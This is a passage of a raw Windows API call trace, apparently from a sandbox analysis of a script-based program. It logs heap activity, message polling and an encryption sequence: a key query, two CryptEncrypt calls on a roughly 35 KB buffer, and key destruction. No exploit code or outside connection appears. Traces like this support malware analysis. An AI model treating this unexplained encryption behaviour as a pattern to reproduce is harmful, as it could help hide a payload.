(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.726] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.726] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.727] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0038.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.728] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.730] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.730] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.730] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.731] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.731] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.731] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.731] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.731] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.731] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.731] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.731] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.731] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.732] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8acf, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8ad0) returned 1 [0038.732] CharLowerBuffW (in: lpsz="byte[35537]", cchLength=0xb | out: lpsz="byte[35537]") returned 0xb [0038.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.733] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xada0a0*, pdwDataLen=0x6ae220*=0x8acf, dwBufLen=0x8ad0 | out: pbData=0xada0a0*, pdwDataLen=0x6ae220*=0x8ad0) returned 1 [0038.735] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.741] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.742] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0038.742] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.742] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.743] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 